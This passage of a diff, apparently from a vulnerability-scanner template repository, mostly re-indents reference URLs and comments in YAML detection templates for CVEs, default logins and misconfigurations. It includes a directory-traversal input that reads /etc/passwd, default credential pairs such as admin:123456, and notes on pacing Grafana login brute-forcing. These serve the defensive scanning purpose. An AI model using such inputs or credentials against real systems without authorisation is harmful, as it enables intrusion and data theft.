- - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+ - https://proxylogon.com/#timeline
+ - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+ - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+ - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:
diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml
index e3038cb194..0b53b90095 100644
--- a/cves/2021/CVE-2021-27651.yaml
+++ b/cves/2021/CVE-2021-27651.yaml
@@ -5,8 +5,8 @@ info:
author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference:
- - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
+ - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass
diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml
index d1f3b5f64f..09c5027755 100644
--- a/cves/2021/CVE-2021-27850.yaml
+++ b/cves/2021/CVE-2021-27850.yaml
@@ -7,7 +7,7 @@ info:
author: pdteam
severity: critical
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry
requests:
diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml
index cdfbaa9e20..b14c3ad7df 100644
--- a/cves/2021/CVE-2021-27905.yaml
+++ b/cves/2021/CVE-2021-27905.yaml
@@ -7,10 +7,10 @@ info:
tags: cve,cve2021,apache,solr,ssrf
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
reference:
- - https://www.anquanke.com/post/id/238201
- - https://ubuntu.com/security/CVE-2021-27905
- - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
+ - https://www.anquanke.com/post/id/238201
+ - https://ubuntu.com/security/CVE-2021-27905
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
+ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
requests:
- raw:
diff --git a/cves/2021/CVE-2021-28073.yaml b/cves/2021/CVE-2021-28073.yaml
index aa5d34e1b3..0414c2d4fc 100644
--- a/cves/2021/CVE-2021-28073.yaml
+++ b/cves/2021/CVE-2021-28073.yaml
@@ -7,8 +7,8 @@ info:
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
tags: ntopng,cve,cve2021
reference:
- - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
+ - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
+ - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml
index 53d98b7bfd..cd88038cd7 100644
--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -5,7 +5,7 @@ info:
author: gy741
severity: medium
description: |
- Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+ Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149
diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml
index 8f28e7f006..0ad974afd4 100644
--- a/cves/2021/CVE-2021-29203.yaml
+++ b/cves/2021/CVE-2021-29203.yaml
@@ -6,8 +6,8 @@ info:
tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference:
- - https://www.tenable.com/security/research/tra-2021-15
- - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
+ - https://www.tenable.com/security/research/tra-2021-15
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
requests:
- raw:
diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml
index 1284ca92c8..51791de0f0 100644
--- a/cves/2021/CVE-2021-29484.yaml
+++ b/cves/2021/CVE-2021-29484.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,xss,ghost
reference:
- - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
+ - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml
index 75942eb988..6e406ccb7c 100644
--- a/cves/2021/CVE-2021-3129.yaml
+++ b/cves/2021/CVE-2021-3129.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference:
- - https://www.ambionics.io/blog/laravel-debug-rce
- - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
+ - https://www.ambionics.io/blog/laravel-debug-rce
+ - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
tags: cve,cve2021,laravel,rce
requests:
diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml
index 0d19eb6202..3c91c1e2a2 100644
--- a/cves/2021/CVE-2021-32820.yaml
+++ b/cves/2021/CVE-2021-32820.yaml
@@ -5,8 +5,8 @@ info:
author: dhiyaneshDk
severity: medium
reference:
- - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi
requests:
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index c81ada639b..77ded129f4 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -4,8 +4,8 @@ info:
name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference:
- - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
+ - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
+ - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml
index b3ef250c02..5a10ae6168 100644
--- a/cves/2021/CVE-2021-34473.yaml
+++ b/cves/2021/CVE-2021-34473.yaml
@@ -7,9 +7,9 @@ info:
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
reference:
- - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
+ - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
+ - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
tags: cve,cve2021,ssrf,rce,exchange
requests:
diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml
index 3c5b70ca06..221dabdf34 100644
--- a/cves/2021/CVE-2021-35336.yaml
+++ b/cves/2021/CVE-2021-35336.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
description: Finding the Tieline Admin Panels with default credentials.
reference:
- - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
+ - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml
index b8984f1cc8..2a3107ae73 100644
--- a/cves/2021/CVE-2021-35464.yaml
+++ b/cves/2021/CVE-2021-35464.yaml
@@ -7,7 +7,7 @@ info:
severity: critical
tags: cve,cve2021,openam,rce,java
reference:
- - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
+ - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
requests:
- method: GET
diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml
index 3009e5de43..ce8a5524c7 100644
--- a/default-logins/alibaba/alibaba-canal-default-password.yaml
+++ b/default-logins/alibaba/alibaba-canal-default-password.yaml
@@ -13,7 +13,7 @@ requests:
headers:
Content-Type: application/json
body: |
- {"username":"admin","password":"123456"}
+ {"username":"admin","password":"123456"}
matchers-condition: and
matchers:
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 49b317b44e..6c73385549 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -18,7 +18,7 @@ requests:
gitlab_user:
- 1234
- admin
- # Enumerate valid user.
+ # Enumerate valid user.
attack: clusterbomb
diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml
index 377385c534..4f7e3f3ba0 100644
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@@ -9,8 +9,8 @@ info:
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755
- # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
- # So make sure, not to attempt more than 4 password for same valid user.
+# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
+# So make sure, not to attempt more than 4 password for same valid user.
requests:
@@ -42,7 +42,7 @@ requests:
{"user":"admin","password":"§grafana_password§"}
- # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
+ # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
matchers-condition: and
matchers:
diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml
index 90151fd83a..9f966d436d 100644
--- a/dns/azure-takeover-detection.yaml
+++ b/dns/azure-takeover-detection.yaml
@@ -8,9 +8,9 @@ info:
reference:
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
- # Update the list with more CNAMEs related to Azure
- # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
- # Do not report this without claiming the CNAME.
+# Update the list with more CNAMEs related to Azure
+# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
+# Do not report this without claiming the CNAME.
dns:
- name: "{{FQDN}}"
diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml
index 2e3f547468..7f0f4ec6ea 100644
--- a/dns/detect-dangling-cname.yaml
+++ b/dns/detect-dangling-cname.yaml
@@ -6,10 +6,10 @@ info:
severity: info
tags: dns,takeover
reference:
- - https://securitytrails.com/blog/subdomain-takeover-tips
- - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
- - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
- - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
+ - https://securitytrails.com/blog/subdomain-takeover-tips
+ - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
+ - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
+ - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
dns:
- name: "{{FQDN}}"
diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml
index 97c367ccdf..443d7a8e30 100644
--- a/exposures/apis/wadl-api.yaml
+++ b/exposures/apis/wadl-api.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: exposure,api
reference:
- - https://github.com/dwisiswant0/wadl-dumper
- - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
+ - https://github.com/dwisiswant0/wadl-dumper
+ - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
requests:
- method: GET
diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml
index b1b2a4644a..ae750dfce4 100644
--- a/exposures/configs/exposed-gitignore.yaml
+++ b/exposures/configs/exposed-gitignore.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: config,git,exposure
reference:
- - https://twitter.com/pratiky9967/status/1230001391701086208
- - https://www.tenable.com/plugins/was/98595
+ - https://twitter.com/pratiky9967/status/1230001391701086208
+ - https://www.tenable.com/plugins/was/98595
requests:
- method: GET
diff --git a/exposures/configs/exposed-sharepoint-list.yaml b/exposures/configs/exposed-sharepoint-list.yaml
index c1bacf772a..160b2c7e10 100644
--- a/exposures/configs/exposed-sharepoint-list.yaml
+++ b/exposures/configs/exposed-sharepoint-list.yaml
@@ -5,8 +5,8 @@ info:
author: ELSFA7110
severity: low
reference:
- - https://hackerone.com/reports/761158
- - https://hackerone.com/reports/300539
+ - https://hackerone.com/reports/761158
+ - https://hackerone.com/reports/300539
tags: config,exposure,sharepoint
requests:
diff --git a/exposures/configs/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml
index 6489c2c300..923f40f980 100644
--- a/exposures/configs/qdpm-info-leak.yaml
+++ b/exposures/configs/qdpm-info-leak.yaml
@@ -7,7 +7,7 @@ info:
severity: high
tags: qdpm,exposure
reference:
- - https://www.exploit-db.com/exploits/50176
+ - https://www.exploit-db.com/exploits/50176
requests:
- method: GET
diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml
index bfb8e30862..802ed499db 100644
--- a/fuzzing/iis-shortname.yaml
+++ b/fuzzing/iis-shortname.yaml
@@ -7,8 +7,8 @@ info:
tags: fuzz
reference:
- - https://github.com/lijiejie/IIS_shortname_Scanner
- - https://www.exploit-db.com/exploits/19525
+ - https://github.com/lijiejie/IIS_shortname_Scanner
+ - https://www.exploit-db.com/exploits/19525
requests:
- raw:
diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml
index e57ca76fa2..a091ac8494 100644
--- a/headless/postmessage-tracker.yaml
+++ b/headless/postmessage-tracker.yaml
@@ -18,33 +18,33 @@ headless:
args:
hook: true
code: |
- (function() {window.alerts = [];
+ (function() {window.alerts = [];
- function logger(found) {
- window.alerts.push(found);
+ function logger(found) {
+ window.alerts.push(found);
+ }
+
+ function getStackTrace () {
+ var stack;
+ try {
+ throw new Error('');
}
-
- function getStackTrace () {
- var stack;
- try {
- throw new Error('');
- }
- catch (error) {
- stack = error.stack || '';
- }
- stack = stack.split('\n').map(function (line) { return line.trim(); });
- return stack.splice(stack[0] == 'Error' ? 2 : 1);
+ catch (error) {
+ stack = error.stack || '';
}
+ stack = stack.split('\n').map(function (line) { return line.trim(); });
+ return stack.splice(stack[0] == 'Error' ? 2 : 1);
+ }
- var oldListener = Window.prototype.addEventListener;
+ var oldListener = Window.prototype.addEventListener;
- Window.prototype.addEventListener = function(type, listener, useCapture) {
- if(type === 'message') {
- logger(getStackTrace());
- }
- return oldListener.apply(this, arguments);
- };
- })();
+ Window.prototype.addEventListener = function(type, listener, useCapture) {
+ if(type === 'message') {
+ logger(getStackTrace());
+ }
+ return oldListener.apply(this, arguments);
+ };
+ })();
- args:
url: "{{BaseURL}}"
action: navigate
diff --git a/miscellaneous/tabnabbing-check.yaml b/miscellaneous/tabnabbing-check.yaml
index a7085d4359..b92943f34c 100644
--- a/miscellaneous/tabnabbing-check.yaml
+++ b/miscellaneous/tabnabbing-check.yaml
@@ -6,9 +6,9 @@ info:
severity: info
tags: misc
reference:
- - https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- - https://www.youtube.com/watch?v=TMKZCHYmtD4
- - https://hackerone.com/reports/211065
+ - https://owasp.org/www-community/attacks/Reverse_Tabnabbing
+ - https://www.youtube.com/watch?v=TMKZCHYmtD4
+ - https://hackerone.com/reports/211065
requests:
- method: GET
diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml
index 0e02a7f3ae..6458cde99d 100644
--- a/miscellaneous/unpatched-coldfusion.yaml
+++ b/miscellaneous/unpatched-coldfusion.yaml
@@ -5,8 +5,8 @@ info:
author: Daviey
severity: info
reference:
- - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
- - https://twitter.com/Daviey/status/1374070630283415558
+ - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
+ - https://twitter.com/Daviey/status/1374070630283415558
tags: rce,adobe,misc
requests:
diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml
index 7fb7ddc1a7..9d1034a158 100644
--- a/misconfiguration/akamai-arl-xss.yaml
+++ b/misconfiguration/akamai-arl-xss.yaml
@@ -6,11 +6,11 @@ info:
severity: medium
tags: akamai,xss
reference:
- - https://github.com/war-and-code/akamai-arl-hack
- - https://twitter.com/SpiderSec/status/1421176297548435459
- - https://warandcode.com/post/akamai-arl-hack/
- - https://github.com/cybercdh/goarl
- - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
+ - https://github.com/war-and-code/akamai-arl-hack
+ - https://twitter.com/SpiderSec/status/1421176297548435459
+ - https://warandcode.com/post/akamai-arl-hack/
+ - https://github.com/cybercdh/goarl
+ - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
requests:
- method: GET
diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml
index 83fbedf084..c169a53e49 100644
--- a/misconfiguration/exposed-service-now.yaml
+++ b/misconfiguration/exposed-service-now.yaml
@@ -6,8 +6,8 @@ info:
severity: info
description: detectes misconfigured Service-now ITSM instances
reference:
- - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- - https://github.com/leo-hildegarde/SnowDownKB/
+ - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
+ - https://github.com/leo-hildegarde/SnowDownKB/
tags: servicenow
requests:
diff --git a/misconfiguration/gitlab/gitlab-public-repos.yaml b/misconfiguration/gitlab/gitlab-public-repos.yaml
index 7f0ed11c0f..0a2869055e 100644
--- a/misconfiguration/gitlab/gitlab-public-repos.yaml
+++ b/misconfiguration/gitlab/gitlab-public-repos.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: gitlab
reference:
- - https://twitter.com/ldionmarcil/status/1370052344562470922
- - https://github.com/ldionmarcil/gitlab-unauth-parser
+ - https://twitter.com/ldionmarcil/status/1370052344562470922
+ - https://github.com/ldionmarcil/gitlab-unauth-parser
requests:
- method: GET
diff --git a/misconfiguration/gitlab/gitlab-public-snippets.yaml b/misconfiguration/gitlab/gitlab-public-snippets.yaml
index 61a24b4fd3..aff6a9ff43 100644
--- a/misconfiguration/gitlab/gitlab-public-snippets.yaml
+++ b/misconfiguration/gitlab/gitlab-public-snippets.yaml
@@ -5,8 +5,8 @@ info:
severity: info
tags: gitlab
reference:
- - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
- - https://twitter.com/intigriti/status/1375078783338876929
+ - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
+ - https://twitter.com/intigriti/status/1375078783338876929
requests:
- method: GET
diff --git a/misconfiguration/gitlab/gitlab-user-enumeration.yaml b/misconfiguration/gitlab/gitlab-user-enumeration.yaml
index 50a937dc36..9a7fb41992 100644
--- a/misconfiguration/gitlab/gitlab-user-enumeration.yaml
+++ b/misconfiguration/gitlab/gitlab-user-enumeration.yaml
@@ -14,9 +14,9 @@ requests:
headers:
Content-Type: application/json
body: |
- {
- "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
- }
+ {
+ "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
+ }
matchers-condition: and
diff --git a/misconfiguration/sap/sap-netweaver-info-leak.yaml b/misconfiguration/sap/sap-netweaver-info-leak.yaml
index 22bec165a9..f39c4f1d79 100644
--- a/misconfiguration/sap/sap-netweaver-info-leak.yaml
+++ b/misconfiguration/sap/sap-netweaver-info-leak.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: sap
reference:
- - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/
- - https://github.com/Jean-Francois-C/SAP-Security-Audit
+ - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/
+ - https://github.com/Jean-Francois-C/SAP-Security-Audit
requests:
- method: GET
diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml
index b1e5ae80f7..116f3cd89b 100644
--- a/misconfiguration/zabbix-dashboards-access.yaml
+++ b/misconfiguration/zabbix-dashboards-access.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
description: View dashboard with guest login.
reference:
- - https://www.exploit-db.com/ghdb/5595
- - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
+ - https://www.exploit-db.com/ghdb/5595
+ - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
tags: zabbix,unauth
requests:
diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml
index 2b4744a079..0897da8dc9 100644
--- a/network/deprecated-sshv1-detection.yaml
+++ b/network/deprecated-sshv1-detection.yaml
@@ -7,8 +7,8 @@ info:
tags: network,ssh,openssh
description: SSHv1 is a deprecated and have known cryptographic issues.
reference:
- - https://www.kb.cert.org/vuls/id/684820
- - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
+ - https://www.kb.cert.org/vuls/id/684820
+ - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
network:
- host:
diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml
index ece21f2b90..bd7a7338cc 100644
--- a/network/openssh5.3-detect.yaml
+++ b/network/openssh5.3-detect.yaml
@@ -7,9 +7,9 @@ info:
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities.
reference:
- - http://seclists.org/fulldisclosure/2016/Jul/51
- - https://security-tracker.debian.org/tracker/CVE-2016-6210
- - http://openwall.com/lists/oss-security/2016/08/01/2
+ - http://seclists.org/fulldisclosure/2016/Jul/51
+ - https://security-tracker.debian.org/tracker/CVE-2016-6210
+ - http://openwall.com/lists/oss-security/2016/08/01/2
network:
- host:
diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml
index a3eea7ead5..f39d129637 100644
--- a/takeovers/ceros-takeover.yaml
+++ b/takeovers/ceros-takeover.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: takeover
reference:
- - https://twitter.com/abison_binoy/status/1412606224030339072
- - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/
+ - https://twitter.com/abison_binoy/status/1412606224030339072
+ - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/
requests:
- method: GET
diff --git a/technologies/detect-sentry.yaml b/technologies/detect-sentry.yaml
index 8a63c406fe..c89bc2ccda 100644
--- a/technologies/detect-sentry.yaml
+++ b/technologies/detect-sentry.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: ssrf,sentry,tech
reference:
- - https://hackerone.com/reports/374737
- - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
+ - https://hackerone.com/reports/374737
+ - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
requests:
- method: GET
diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft-exchange-server-detect.yaml
index b89745b772..d400fe85de 100644
--- a/technologies/microsoft-exchange-server-detect.yaml
+++ b/technologies/microsoft-exchange-server-detect.yaml
@@ -6,7 +6,7 @@ info:
severity: info
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: |
- Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
+ Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
requests:
- method: GET
diff --git a/technologies/waf-detect.yaml b/technologies/waf-detect.yaml
index a106e71a07..5eba810d3c 100644
--- a/technologies/waf-detect.yaml
+++ b/technologies/waf-detect.yaml
@@ -10,11 +10,11 @@ info:
requests:
- raw:
- |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- _=
+ _=
matchers:
- type: regex
diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml
index 9d6613cfe9..bb2304cee1 100644
--- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml
+++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
tags: apache,flink,rce
reference:
- - https://www.exploit-db.com/exploits/48978
- - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
- - https://github.com/LandGrey/flink-unauth-rce
+ - https://www.exploit-db.com/exploits/48978
+ - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
+ - https://github.com/LandGrey/flink-unauth-rce
requests:
- raw:
diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml
index dfe9936edd..56a6ada58d 100644
--- a/vulnerabilities/apache/apache-solr-file-read.yaml
+++ b/vulnerabilities/apache/apache-solr-file-read.yaml
@@ -6,9 +6,9 @@ info:
severity: high
tags: apache,solr,lfi
reference:
- - https://twitter.com/Al1ex4/status/1382981479727128580
- - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
- - https://twitter.com/sec715/status/1373472323538362371
+ - https://twitter.com/Al1ex4/status/1382981479727128580
+ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
